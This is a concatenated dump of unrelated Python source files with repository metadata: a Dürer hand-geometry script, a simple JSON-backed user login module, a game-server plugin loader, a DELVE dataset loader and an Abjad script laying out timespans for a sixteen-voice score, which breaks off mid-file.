points[1] = ((points[0][0] + points[2][0]) * 0.5, (points[0][1] + points[2][1]) * 0.5)
points[3] = (-hand_width / 2 + KN / 4, O)
points[4] = (-hand_width / 2, K)
# index finger
points[5] = (- middle_finger_width / 2 - index_finger_width / 2, M)
points[6] = (- middle_finger_width / 2 - index_finger_width / 2, H - HL / 2 * 7 / 7)
points[7] = (- middle_finger_width / 2 - index_finger_width / 2 * 4 / 5, H - HL / 2 * 3 / 7)
points[8] = (- middle_finger_width / 2 - index_finger_width / 2 * 4 / 5, H)
# middle finger
points[9] = (0, M)
points[10] = (0, P)
points[11] = (0, C - CP * 3 / 7)
points[12] = (0, C)
middle_finger_half_height = points[11][1] - points[9][1]
# ring finger
# HACK! Durer non è stato molto chiaro per la nocca dell'anulare, devo interpolare
ring_finger_lower_article = M - (M - (I - middle_finger_half_height)) / 2
ring_finger_width = abs(G - ring_finger_lower_article) / 5
points[13] = (middle_finger_width / 2 + ring_finger_width / 2, ring_finger_lower_article)
points[14] = (middle_finger_width / 2 + ring_finger_width / 2, K)
points[15] = (middle_finger_width / 2 + ring_finger_width / 2 * 3 / 4, G - KG * 4 / 9)
points[16] = (middle_finger_width / 2 + ring_finger_width / 2 * 3 / 4, G)
# little finger
little_finger_width = middle_finger_half_height / 5
points[17] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2, I - middle_finger_half_height)
points[18] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2,
I - middle_finger_half_height * 6 / 11)
points[19] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2 * 3 / 4,
I - middle_finger_half_height * 6 / 11 * 6 / 11)
points[20] = (middle_finger_width / 2 + ring_finger_width + little_finger_width / 2 * 3 / 4, I)
return [(int(x), int(y)) for x, y in points]
if __name__ == "__main__":
img = cv2.imread(os.path.join(os.path.dirname(__file__), "durer_sample.png"))
# translate points to hand origin in image
origin = (635, 675)
h = 590 # height in pixel of hand in durer
points = [(int(x) + int(origin[0]), int(origin[1]) - int(y)) for x, y in durerizer(h)]
cv2.imshow('durer in the machine (any key to close)', annotate_frame_with_features(img, points=points))
key = cv2.waitKey(0)
cv2.destroyAllWindows() | [
"balasoft.inc@gmail.com"
] | balasoft.inc@gmail.com |
5bd63ee4b6271280ce2d00304ffa469d4f87c56e | cca3447dc39a8437724b90d05e0808e57ab42dba | /users.py | 3b0913f9fedf840e691e5cc21b481155973d1836 | [] | no_license | willseenc/films_prog | 0f181dd6512afc3c9b4c5370ed4fe356a336c26b | 75bc36555b64fd2fc0b1fa5fd70d6cc9ccdbc349 | refs/heads/main | 2023-07-17T21:01:17.168901 | 2021-08-29T18:37:41 | 2021-08-29T18:37:41 | 397,246,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,375 | py | from settings import JSON_PATH_USERS
import random
import string
from exceptions import WrongInfo, check_length
from jsonworker import append_new_data_to_file, read_json_file
class User:
@check_length
def special_password(length):
password = string.ascii_letters
random_password = ''.join(random.choice(password) \
for i in range(int(length)))
return(random_password)
@staticmethod
def registration(user_name, password):
user = User({f'{user_name}' : True, f'{password}' : True})
User.append_to_json_file(user)
@staticmethod
def sign_in(user_name, password):
for user_hash in read_json_file(JSON_PATH_USERS):
try:
auth_nickname = user_hash[user_name]
auth_password = user_hash[password]
except:
continue
else:
if auth_nickname and auth_password:
return User({user_name : True, password : True})
raise WrongInfo('Пароль или логин неверен!')
def __init__(self, user_hash):
self.username = list(user_hash.keys())[0]
self.password = list(user_hash.keys())[1]
self.user_hash = user_hash
def append_to_json_file(self):
return append_new_data_to_file(JSON_PATH_USERS, self.user_hash, 0, 0)
| [
"azat1703@gmail.com"
] | azat1703@gmail.com |
c4b7543aef20c0f91e3502dbd9450891de0aa98e | 8c6e9396ae73c41220bb77dfa68dc872f454866e | /multiverse/config/common/groupplugin.py | db8de2c212b0f2351c804990a5a881ca888a0a34 | [] | no_license | jfkfhhfj/LegendaryRealmsMMO | d5d203c89fbd280ff45f2b7e36eb1b1c3c7a3faf | f563432514d121b5d0aed398bed718998257bf6d | refs/heads/master | 2021-01-19T06:20:07.118556 | 2014-02-07T00:27:11 | 2014-02-07T00:39:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,783 | py | #
#
# The Multiverse Platform is made available under the MIT License.
#
# Copyright (c) 2012 The Multiverse Foundation
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#
#
from multiverse.mars import *
from multiverse.mars.core import *
from multiverse.mars.objects import *
from multiverse.mars.util import *
from multiverse.server.math import *
from multiverse.server.events import *
from multiverse.server.objects import *
from multiverse.server.engine import *
from multiverse.server.util import *
from multiverse.server.plugins import *
Log.debug("groupplugin.py: starting")
classesPlugin = Engine.registerPlugin("multiverse.mars.plugins.GroupPlugin")
Log.debug("groupplugin.py: done")
| [
"jfkfhhfj@gmail.com"
] | jfkfhhfj@gmail.com |
20e6043502410602386f2cd8c3b9b5696b7035c0 | dd55081656657596667bab4ab4ab4d3a38d1503b | /datasets/delve.py | 2ef78120bb5c2a882a8c528ec141b6dd0899d2fc | [
"BSD-2-Clause"
] | permissive | tkemps/mklaren | 76c5a45220bd86fcf58a05f29cc5e1b116e6a48c | d9e7890aaa26cb3877e1a82114ab1e52df595d96 | refs/heads/master | 2020-04-15T19:04:57.387139 | 2018-11-09T14:27:15 | 2018-11-09T14:27:15 | 164,937,161 | 0 | 0 | NOASSERTION | 2019-01-09T21:00:08 | 2019-01-09T21:00:07 | null | UTF-8 | Python | false | false | 6,617 | py | #encoding="utf-8"
from gzip import open as gzopen
from numpy import loadtxt, zeros, array
from os import environ
from os.path import join, dirname, realpath
DELVE_PATH = join(dirname(realpath(__file__)), "delve")
class Specdict(dict):
"""
Default dict for specification of datasets.
"""
TARGET = "TARGET"
def __init__(self):
"""
num_vars is the current number of variables in the mapping.
"""
super(Specdict, self).__init__()
self.num_vars = 0
self.labels = dict()
def add_variable(self, inx, name, values=None):
"""
Add a variable to dictionary.
Categorical variables are indexed by original index (inx)
and value (val).
Continuous variables are index by original index (inx).
"""
# Categorical
if values is not None:
assert values is not None
for val in values:
self[inx, val] = self.num_vars
self.labels[self.num_vars] = name + "_" + str(val)
self.num_vars += 1
# Continuous
else:
self[inx] = self.num_vars
self.labels[self.num_vars] = name
self.num_vars += 1
def add_target(self, inx):
"""
Add target variable y.
"""
self[inx] = self.TARGET
def parse_spec(specfile):
"""
Parse specification file as a dict.
:param specfile
Path to the .spec file.
:return
Mapping original index -> matrix index.
"""
sd = Specdict()
fp = open(specfile, "r")
inx = 0 # Original index
line = fp.readline()
while line:
if not line.startswith("#"):
ls = line.strip().split()
name = ls[1]
typ = ls[2] # If type is categorical,
# expect range to be stored in the neighbouring column
# All categorical variables are strings.
if typ == "c":
rng = ls[3]
if ".." in rng:
start, end = map(int, rng.split(".."))
values = range(start, end+1)
values = map(str, values)
elif "," in rng:
values = rng.split(",")
sd.add_variable(inx=inx, name=name,
values=values)
elif typ == "u":
sd.add_variable(inx=inx, name=name,)
elif typ == "y":
sd.add_target(inx)
else:
pass
inx += 1
line = fp.readline()
return sd
def load_delve(dataset_path, dataset_spec, n=None):
"""
Load an delve dataset. Specification is given by the spec file.
:param dataset_path
Path to the .data.gz file.
:param dataset_spec
Path to the .spec file.
:param n
If defined, read only first n rows.
:return
Dictionary data, target.
"""
rdict = dict()
sd = parse_spec(dataset_spec)
fp = gzopen(dataset_path, "r")
line = str(fp.readline())
count = 0
X = list()
y = list()
while line:
if line.count('\\'):
# Must read another line
line = line.strip().replace("\\", "") + str(fp.readline())
x = zeros((sd.num_vars, ))
for i, v in enumerate(line.strip().split()):
if i in sd:
if sd[i] == sd.TARGET:
y.append(float(v))
else:
j = sd[i]
x[j] = float(v)
elif (i, v) in sd:
j = sd[i, v]
x[j] = 1
else:
pass
X.append(x)
line = str(fp.readline())
count += 1
if n is not None and count == n:
break
rdict["data"] = array(X)
rdict["target"] = array(y)
rdict["labels"] = [sd.labels[i] for i in range(len(X[0]))]
return rdict
def load_abalone(n=None):
return load_delve(dataset_path=join(DELVE_PATH, "abalone", "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "abalone", "Dataset.spec"),
n = n)
def load_boston(n=None):
return load_delve(dataset_path=join(DELVE_PATH, "boston", "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "boston", "Dataset.spec"),
n = n)
def load_census_house(n=None):
return load_delve(dataset_path=join(DELVE_PATH, "census-house", "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "census-house", "Dataset.spec"),
n = n)
def load_comp_activ(n=None):
return load_delve(dataset_path=join(DELVE_PATH, "comp-activ", "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "comp-activ", "Dataset.spec"),
n = n)
def load_bank(typ="8fh", n=None):
return load_delve(dataset_path=join(DELVE_PATH, "bank", "bank-%s" % typ, "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "bank", "bank-%s" % typ, "Dataset.spec"),
n = n)
def load_pumadyn(typ="8fh", n=None):
return load_delve(dataset_path=join(DELVE_PATH, "pumadyn", "pumadyn-%s" % typ, "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "pumadyn", "pumadyn-%s" % typ, "Dataset.spec"),
n = n)
def load_kin(typ="8fh", n=None):
return load_delve(dataset_path=join(DELVE_PATH, "kin", "kin-%s" % typ, "Dataset.data.gz"),
dataset_spec=join(DELVE_PATH, "kin", "kin-%s" % typ, "Dataset.spec"),
n = n)
if __name__ == "__main__":
for load in [
load_abalone,
load_census_house,
load_comp_activ,
load_boston,
]:
data = load()
X = data["data"]
y = data["target"]
labels = data["labels"]
print(X.shape, y.shape)
print(labels)
assert X.sum() != 0
assert y.sum() != 0
print
for load in [
load_bank,
load_pumadyn,
load_kin,
]:
for num in "8", "32":
for t in ["fh", "fm", "nh", "nm"]:
typ = "%s%s" % (num, t)
data = load(typ=typ)
X = data["data"]
y = data["target"]
labels = data["labels"]
print(load, X.shape, y.shape)
assert X.sum() != 0
assert y.sum() != 0
print()
| [
"martin.strazar@gmail.com"
] | martin.strazar@gmail.com |
ad98a84cb7b5beefed9cb530b9b8658d50e74def | e798ba63a2be30dd98a544af906cfbb31cf6e225 | /Test/subtest/Test.py | 69556b393dbc4c143c3b1ddae34d9559b92126d4 | [] | no_license | ivanalexandermoscotta/guerrero | 5f5c25150ca00ec3b665423027e3b605a8e89c56 | 7c4a493c99d7b692d66e43e9cd4b141041d4474c | refs/heads/master | 2020-03-28T11:01:04.910466 | 2018-09-20T19:09:35 | 2018-09-20T19:09:35 | 148,169,122 | 1 | 0 | null | 2018-09-20T19:09:36 | 2018-09-10T14:35:13 | LilyPond | UTF-8 | Python | false | false | 30,139 | py | import abjad
import itertools
import os
import pathlib
import time
import abjadext.rmakers
from MusicMaker import MusicMaker
from AttachmentHandler import AttachmentHandler
print('Interpreting file ...')
# Define the time signatures we would like to apply against the timespan structure.
time_signatures = [
abjad.TimeSignature(pair) for pair in [
(5, 4), (4, 4), (3, 4), (5, 4), (4, 4), (3, 4),
(3, 4), (4, 4), (5, 4), (3, 4), (4, 4), (5, 4),
]
]
bounds = abjad.mathtools.cumulative_sums([_.duration for _ in time_signatures])
# Define rhythm-makers: two to be used by the MusicMaker, one for silence.
rmaker_001 = abjadext.rmakers.TaleaRhythmMaker(
talea=abjadext.rmakers.Talea(
counts=[1, 1, 1, 5, 3, 2, 4],
denominator=16,
),
beam_specifier=abjadext.rmakers.BeamSpecifier(
beam_divisions_together=True,
beam_rests=False,
),
extra_counts_per_division=[0, 1, ],
burnish_specifier=abjadext.rmakers.BurnishSpecifier(
left_classes=[abjad.Rest],
left_counts=[1, 0, 1],
),
tuplet_specifier=abjadext.rmakers.TupletSpecifier(
trivialize=True,
extract_trivial=True,
rewrite_rest_filled=True,
),
)
rmaker_002 = abjadext.rmakers.TaleaRhythmMaker(
talea=abjadext.rmakers.Talea(
counts=[4, 3, -1, 2],
denominator=8,
),
beam_specifier=abjadext.rmakers.BeamSpecifier(
beam_divisions_together=True,
beam_rests=False,
),
extra_counts_per_division=[-1, 0,],
burnish_specifier=abjadext.rmakers.BurnishSpecifier(
left_classes=[abjad.Rest],
left_counts=[1, 0, 1],
),
tuplet_specifier=abjadext.rmakers.TupletSpecifier(
trivialize=True,
extract_trivial=True,
rewrite_rest_filled=True,
),
)
attachment_handler = AttachmentHandler(
starting_dynamic='mf',
ending_dynamic='ff',
trend='o<',
articulation='staccato'
)
# Initialize two MusicMakers with the rhythm-makers.
rmaker_one = MusicMaker(
rmaker=rmaker_001,
pitches=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
continuous=True,
attachment_handler=attachment_handler,
)
rmaker_two = MusicMaker(
rmaker=rmaker_002,
continuous=True,
attachment_handler=attachment_handler,
)
silence_maker = abjadext.rmakers.NoteRhythmMaker(
division_masks=[
abjadext.rmakers.SilenceMask(
pattern=abjad.index([0], 1),
),
],
)
# Define a small class so that we can annotate timespans with additional
# information:
class MusicSpecifier:
def __init__(self, rhythm_maker, voice_name):
self.rhythm_maker = rhythm_maker
self.voice_name = voice_name
# Define an initial timespan structure, annotated with music specifiers. This
# structure has not been split along meter boundaries. This structure does not
# contain timespans explicitly representing silence. Here I make four, one
# for each voice, using Python's list comprehension syntax to save some
# space.
print('Collecting timespans and rmakers ...')
voice_1_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 1',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_one],
[(5, 4), (8, 4), rmaker_one],
[(12, 4), (15, 4), rmaker_two],
[(17, 4), (20, 4), rmaker_one],
[(28, 4), (31, 4), rmaker_two],
[(33, 4), (36, 4), rmaker_two],
[(40, 4), (43, 4), rmaker_one],
[(45, 4), (48, 4), rmaker_two],
]
])
voice_5_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 5',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_one],
[(5, 4), (8, 4), rmaker_one],
[(12, 4), (15, 4), rmaker_two],
[(17, 4), (20, 4), rmaker_one],
[(28, 4), (31, 4), rmaker_two],
[(33, 4), (36, 4), rmaker_two],
[(40, 4), (43, 4), rmaker_one],
[(45, 4), (48, 4), rmaker_two],
]
])
voice_9_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 9',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_one],
[(5, 4), (8, 4), rmaker_one],
[(12, 4), (15, 4), rmaker_two],
[(17, 4), (20, 4), rmaker_one],
[(28, 4), (31, 4), rmaker_two],
[(33, 4), (36, 4), rmaker_two],
[(40, 4), (43, 4), rmaker_one],
[(45, 4), (48, 4), rmaker_two],
]
])
voice_13_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 13',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_one],
[(5, 4), (8, 4), rmaker_one],
[(12, 4), (15, 4), rmaker_two],
[(17, 4), (20, 4), rmaker_one],
[(28, 4), (31, 4), rmaker_two],
[(33, 4), (36, 4), rmaker_two],
[(40, 4), (43, 4), rmaker_one],
[(45, 4), (48, 4), rmaker_two],
]
])
voice_2_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 2',
),
)
for start_offset, stop_offset, rhythm_maker in [
# [(4, 4), (7, 4), rmaker_two],#
[(4, 4), (5, 4), rmaker_two],#
[(5, 4), (7, 4), rmaker_two],#
[(9, 4), (12, 4), rmaker_one],
# [(16, 4), (19, 4), rmaker_two],#
[(16, 4), (17, 4), rmaker_two],#
[(17, 4), (19, 4), rmaker_two],#
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_one],
# [(29, 4), (32, 4), rmaker_two],#
[(29, 4), (31, 4), rmaker_two],#
[(31, 4), (32, 4), rmaker_two],#
[(36, 4), (39, 4), rmaker_one],
# [(41, 4), (44, 4), rmaker_two],#
[(41, 4), (43, 4), rmaker_two],#
[(43, 4), (44, 4), rmaker_two],#
]
])
voice_6_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 6',
),
)
for start_offset, stop_offset, rhythm_maker in [
# [(4, 4), (7, 4), rmaker_two],#
[(4, 4), (5, 4), rmaker_two],#
[(5, 4), (7, 4), rmaker_two],#
[(9, 4), (12, 4), rmaker_one],
# [(16, 4), (19, 4), rmaker_two],#
[(16, 4), (17, 4), rmaker_two],#
[(17, 4), (19, 4), rmaker_two],#
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_one],
# [(29, 4), (32, 4), rmaker_two],#
[(29, 4), (31, 4), rmaker_two],#
[(31, 4), (32, 4), rmaker_two],#
[(36, 4), (39, 4), rmaker_one],
# [(41, 4), (44, 4), rmaker_two],#
[(41, 4), (43, 4), rmaker_two],#
[(43, 4), (44, 4), rmaker_two],#
]
])
voice_10_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 10',
),
)
for start_offset, stop_offset, rhythm_maker in [
# [(4, 4), (7, 4), rmaker_two],#
[(4, 4), (5, 4), rmaker_two],#
[(5, 4), (7, 4), rmaker_two],#
[(9, 4), (12, 4), rmaker_one],
# [(16, 4), (19, 4), rmaker_two],#
[(16, 4), (17, 4), rmaker_two],#
[(17, 4), (19, 4), rmaker_two],#
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_one],
# [(29, 4), (32, 4), rmaker_two],#
[(29, 4), (31, 4), rmaker_two],#
[(31, 4), (32, 4), rmaker_two],#
[(36, 4), (39, 4), rmaker_one],
# [(41, 4), (44, 4), rmaker_two],#
[(41, 4), (43, 4), rmaker_two],#
[(43, 4), (44, 4), rmaker_two],#
]
])
voice_14_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 14',
),
)
for start_offset, stop_offset, rhythm_maker in [
# [(4, 4), (7, 4), rmaker_two],#
[(4, 4), (5, 4), rmaker_two],#
[(5, 4), (7, 4), rmaker_two],#
[(9, 4), (12, 4), rmaker_one],
# [(16, 4), (19, 4), rmaker_two],#
[(16, 4), (17, 4), rmaker_two],#
[(17, 4), (19, 4), rmaker_two],#
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_one],
# [(29, 4), (32, 4), rmaker_two],#
[(29, 4), (31, 4), rmaker_two],#
[(31, 4), (32, 4), rmaker_two],#
[(36, 4), (39, 4), rmaker_one],
# [(41, 4), (44, 4), rmaker_two],#
[(41, 4), (43, 4), rmaker_two],#
[(43, 4), (44, 4), rmaker_two],#
]
])
voice_3_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 3',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(2, 4), (5, 4), rmaker_one],
[(9, 4), (12, 4), rmaker_two],
[(14, 4), (17, 4), rmaker_two],
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_two],
[(31, 4), (34, 4), rmaker_one],
[(36, 4), (39, 4), rmaker_one],
[(43, 4), (46, 4), rmaker_two],
]
])
voice_7_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 7',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(2, 4), (5, 4), rmaker_one],
[(9, 4), (12, 4), rmaker_two],
[(14, 4), (17, 4), rmaker_two],
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_two],
[(31, 4), (34, 4), rmaker_one],
[(36, 4), (39, 4), rmaker_one],
[(43, 4), (46, 4), rmaker_two],
]
])
voice_11_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 11',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(2, 4), (5, 4), rmaker_one],
[(9, 4), (12, 4), rmaker_two],
[(14, 4), (17, 4), rmaker_two],
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_two],
[(31, 4), (34, 4), rmaker_one],
[(36, 4), (39, 4), rmaker_one],
[(43, 4), (46, 4), rmaker_two],
]
])
voice_15_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 15',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(2, 4), (5, 4), rmaker_one],
[(9, 4), (12, 4), rmaker_two],
[(14, 4), (17, 4), rmaker_two],
[(21, 4), (24, 4), rmaker_one],
[(24, 4), (27, 4), rmaker_two],
[(31, 4), (34, 4), rmaker_one],
[(36, 4), (39, 4), rmaker_one],
[(43, 4), (46, 4), rmaker_two],
]
])
voice_4_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 4',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_two],
# [(7, 4), (10, 4), rmaker_two],#
[(7, 4), (9, 4), rmaker_two],#
[(9, 4), (10, 4), rmaker_two],#
[(12, 4), (15, 4), rmaker_one],
# [(19, 4), (22, 4), rmaker_two],#
[(19, 4), (21, 4), rmaker_two],#
[(21, 4), (22, 4), rmaker_two],#
# [(26, 4), (29, 4), rmaker_one],#
[(26, 4), (27, 4), rmaker_one],#
[(27, 4), (29, 4), rmaker_one],#
[(33, 4), (36, 4), rmaker_one],
# [(38, 4), (41, 4), rmaker_two],#
[(38, 4), (39, 4), rmaker_two],#
[(39, 4), (41, 4), rmaker_two],#
[(45, 4), (48, 4), rmaker_one],
]
])
voice_8_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 8',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_two],
# [(7, 4), (10, 4), rmaker_two],#
[(7, 4), (9, 4), rmaker_two],#
[(9, 4), (10, 4), rmaker_two],#
[(12, 4), (15, 4), rmaker_one],
# [(19, 4), (22, 4), rmaker_two],#
[(19, 4), (21, 4), rmaker_two],#
[(21, 4), (22, 4), rmaker_two],#
# [(26, 4), (29, 4), rmaker_one],#
[(26, 4), (27, 4), rmaker_one],#
[(27, 4), (29, 4), rmaker_one],#
[(33, 4), (36, 4), rmaker_one],
# [(38, 4), (41, 4), rmaker_two],#
[(38, 4), (39, 4), rmaker_two],#
[(39, 4), (41, 4), rmaker_two],#
[(45, 4), (48, 4), rmaker_one],
]
])
voice_12_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 12',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_two],
# [(7, 4), (10, 4), rmaker_two],#
[(7, 4), (9, 4), rmaker_two],#
[(9, 4), (10, 4), rmaker_two],#
[(12, 4), (15, 4), rmaker_one],
# [(19, 4), (22, 4), rmaker_two],#
[(19, 4), (21, 4), rmaker_two],#
[(21, 4), (22, 4), rmaker_two],#
# [(26, 4), (29, 4), rmaker_one],#
[(26, 4), (27, 4), rmaker_one],#
[(27, 4), (29, 4), rmaker_one],#
[(33, 4), (36, 4), rmaker_one],
# [(38, 4), (41, 4), rmaker_two],#
[(38, 4), (39, 4), rmaker_two],#
[(39, 4), (41, 4), rmaker_two],#
[(45, 4), (48, 4), rmaker_one],
]
])
voice_16_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
rhythm_maker=rhythm_maker,
voice_name='Voice 16',
),
)
for start_offset, stop_offset, rhythm_maker in [
[(0, 4), (3, 4), rmaker_two],
# [(7, 4), (10, 4), rmaker_two],#
[(7, 4), (9, 4), rmaker_two],#
[(9, 4), (10, 4), rmaker_two],#
[(12, 4), (15, 4), rmaker_one],
# [(19, 4), (22, 4), rmaker_two],#
[(19, 4), (21, 4), rmaker_two],#
[(21, 4), (22, 4), rmaker_two],#
# [(26, 4), (29, 4), rmaker_one],#
[(26, 4), (27, 4), rmaker_one],#
[(27, 4), (29, 4), rmaker_one],#
[(33, 4), (36, 4), rmaker_one],
# [(38, 4), (41, 4), rmaker_two],#
[(38, 4), (39, 4), rmaker_two],#
[(39, 4), (41, 4), rmaker_two],#
[(45, 4), (48, 4), rmaker_one],
]
])
# Create a dictionary mapping voice names to timespan lists so we can
# maintain the association in later operations:
all_timespan_lists = {
'Voice 1': voice_1_timespan_list,
'Voice 2': voice_2_timespan_list,
'Voice 3': voice_3_timespan_list,
'Voice 4': voice_4_timespan_list,
'Voice 5': voice_5_timespan_list,
'Voice 6': voice_6_timespan_list,
'Voice 7': voice_7_timespan_list,
'Voice 8': voice_8_timespan_list,
'Voice 9': voice_9_timespan_list,
'Voice 10': voice_10_timespan_list,
'Voice 11': voice_11_timespan_list,
'Voice 12': voice_12_timespan_list,
'Voice 13': voice_13_timespan_list,
'Voice 14': voice_14_timespan_list,
'Voice 15': voice_15_timespan_list,
'Voice 16': voice_16_timespan_list,
}
# Determine the "global" timespan of all voices combined:
global_timespan = abjad.Timespan(
start_offset=0,
stop_offset=max(_.stop_offset for _ in all_timespan_lists.values())
)
# Using the global timespan, create silence timespans for each timespan list.
# We don't need to create any silences by-hand if we now the global start and
# stop offsets of all voices combined:
for voice_name, timespan_list in all_timespan_lists.items():
# Here is another technique for finding where the silence timespans are. We
# create a new timespan list consisting of the global timespan and all the
# timespans from our current per-voice timespan list. Then we compute an
# in-place logical XOR. The XOR will replace the contents of the "silences"
# timespan list with a set of timespans representing those periods of time
# where only one timespan from the original was present. This has the
# effect of cutting out holes from the global timespan wherever a per-voice
# timespan was found, but also preserves any silence before the first
# per-voice timespan or after the last per-voice timespan. Then we merge
# the newly-created silences back into the per-voice timespan list.
silences = abjad.TimespanList([global_timespan])
silences.extend(timespan_list)
silences.sort()
silences.compute_logical_xor()
# Add the silences into the voice timespan list. We create new *annotated*
# timespans so we can maintain the voice name information:
for silence_timespan in silences:
timespan_list.append(
abjad.AnnotatedTimespan(
start_offset=silence_timespan.start_offset,
stop_offset=silence_timespan.stop_offset,
annotation=MusicSpecifier(
rhythm_maker=None,
voice_name=voice_name,
),
)
)
timespan_list.sort()
# Split the timespan list via the time signatures and collect the shards into a
# new timespan list
for voice_name, timespan_list in all_timespan_lists.items():
shards = timespan_list.split_at_offsets(bounds)
split_timespan_list = abjad.TimespanList()
for shard in shards:
split_timespan_list.extend(shard)
split_timespan_list.sort()
# We can replace the original timespan list in the dictionary of
# timespan lists because we know the key it was stored at (its voice
# name):
all_timespan_lists[voice_name] = timespan_list
# Create a score structure
score = abjad.Score([
abjad.Staff(lilypond_type='TimeSignatureContext', name='Global Context'),
abjad.StaffGroup(
[
abjad.Staff([abjad.Voice(name='Voice 1')],name='Staff 1', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 2')],name='Staff 2', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 3')],name='Staff 3', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 4')],name='Staff 4', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 5')],name='Staff 5', lilypond_type='Staff',),
